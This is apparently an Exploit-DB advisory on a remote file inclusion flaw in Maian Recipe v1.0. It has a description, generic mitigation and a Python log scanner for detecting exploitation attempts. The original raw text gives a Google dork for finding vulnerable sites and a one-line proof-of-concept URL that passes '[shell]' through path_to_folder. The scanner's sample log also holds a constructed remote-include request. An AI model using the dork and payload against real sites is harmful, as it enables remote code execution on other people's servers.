Vendor: Maian Recipe
By: Denven
CVSS: 5.5 (MEDIUM)
Type: Remote File Inclusion
CWE: 98
Product Name: Maian Recipe
Affected Version From: Maian Recipe v1.0
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:maianscriptworld:maian_recipe:1.0
Metasploit:
Other Scripts:
Platforms Tested:
2007

Maian Recipe v1.0 Remote File Inclusion Vulnerability

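The vulnerability is caused by an insecure include() in the file classes/class_mail.inc.php: the include path is built from the variable $path_to_folder, which an attacker can set through the path_to_folder request parameter. An attacker can exploit this vulnerability to execute arbitrary PHP code by including a remote file.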

Mitigation:

The vendor should update the software to a secure version that does not have this vulnerability. Users should also ensure that they are using the latest version of the software and apply any patches or updates provided by the vendor.
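
Because no patch is listed, one interim check is to review web server access logs for requests that reach classes/class_mail.inc.php directly or pass it a path_to_folder value. The following is an added example, not part of the original advisory or the vendor's code; it assumes common/combined log format, and the sample log lines and host names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request field of a common/combined access-log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# URL schemes and PHP stream wrappers that point an include() away from local files.
SCHEME_RE = re.compile(r"^\s*(?:https?|ftps?|php|data|expect|phar|zip)\s*:", re.I)
TARGET = "classes/class_mail.inc.php"   # file named in the advisory
PARAM = "path_to_folder"                # variable named in the advisory


def classify(log_line):
    """Return None, 'direct-access', 'param-set' or 'remote-include'."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # Decode the path so percent-encoding cannot hide the script name.
    if not unquote(url.path).lower().endswith(TARGET):
        return None
    # Assumption: the class file is only ever include()d, never requested directly.
    verdict = "direct-access"
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key != PARAM:
            continue
        if SCHEME_RE.match(value):   # value is already percent-decoded once
            return "remote-include"
        verdict = "param-set"
    return verdict


def scan(lines):
    """Return (line_number, verdict) for every log line that needs review."""
    tagged = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in tagged if v]


# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '192.0.2.10 - - [07/Feb/2007:10:00:01 +0000] "GET /recipes/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [07/Feb/2007:10:02:13 +0000] "GET /recipes/classes/class_mail.inc.php HTTP/1.1" 200 0',
    '192.0.2.44 - - [07/Feb/2007:10:02:19 +0000] "GET /recipes/classes/class_mail.inc.php?path_to_folder=http%3A%2F%2Fhost.example.test%2Fa.txt%3F HTTP/1.0" 200 431',
    '192.0.2.51 - - [07/Feb/2007:10:05:40 +0000] "GET /recipes/classes/class_mail.inc.php?path_to_folder=../ HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Any hit is worth reviewing: a `remote-include` verdict on a request that returned 200 with a non-empty body is the strongest signal, while `direct-access` alone usually indicates probing.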

Exploit-DB raw data:

*****************
Found by Denven *
*****************
*****************
*****************
Script: http://www.maianscriptworld.co.uk/freestuff_1975_recipe.html
*****************
Google Dork: "Powered by Maian Recipe v1.0"
*****************
ERROR:
classes/class_mail.inc.php :

include($path_to_folder.'classes/class.phpmailer.php');


****************************************************************************
**********
RFI:

http://www.SITE.com/path/classes/class_mail.inc.php?path_to_folder=[shell]

****************************************************************************
**********
denven[at]gmail[dot]com

# milw0rm.com [2007-02-07]